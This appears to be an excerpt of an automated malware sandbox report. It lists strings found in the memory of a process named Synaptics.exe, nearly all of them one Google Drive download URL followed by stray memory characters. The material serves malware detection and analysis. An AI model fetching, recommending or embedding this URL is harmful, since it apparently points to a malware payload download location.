                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUj
                                Source: Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUo
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4194221853.000000001DE3B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4144627466.000000000F1F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV3
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVH
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVQ
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVg
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW9n
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWk
                                Source: Synaptics.exe, 00000002.00000002.4093452234.00000000080AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWw
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D93E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX.
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXJ
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXi
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4139287238.000000000EFD2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.0000000005660000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.00000000081C6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4188042164.000000001DCEB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000818E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYN
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYd
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmN
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadme
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmeasu:
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmiss
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmj
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadml
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmooof
                                Source: Synaptics.exe, 00000002.00000002.4085838285.0000000005660000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D93E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4194221853.000000001DE3B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4144627466.000000000F1F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn-lis
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.neC
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnM
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnQ
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnc
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncellm
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadndica/
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnes
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnet.c
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetle
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetlez
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnimu
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyo
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadno-r
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadno-st
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnts
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.2572800198.000000003BBB8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.00000000080AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado1
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadog
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogle
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogle-b
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogle.W
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogles
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogletU
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoid.cV
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4194221853.000000001DE3B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom.
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000818E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadonte
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo=
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4194221853.000000001DE3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogle
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador..
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador...
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadorigi
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadou
                                Source: Synaptics.exe, 00000002.00000002.4177290869.000000001D74A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4209599990.0000000023F7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpD
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpO
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadps
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4139287238.000000000EFD2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4188042164.000000001DCEB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqH
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqd
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqg
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqi
                                Source: Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D93E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4144627466.000000000F1F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr2
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr:
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrG
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrch
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadre
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrive.
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrse
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4141841776.000000000F0D0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads-fo
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D93E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads1j
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsK
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadseQ
                                Source: Synaptics.exe, 00000002.00000002.4093452234.00000000080AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsvj
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.000000000088B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4194221853.000000001DE3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D93E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt%
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000818E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt.go
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt1E
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt:15p
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtB2
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtI
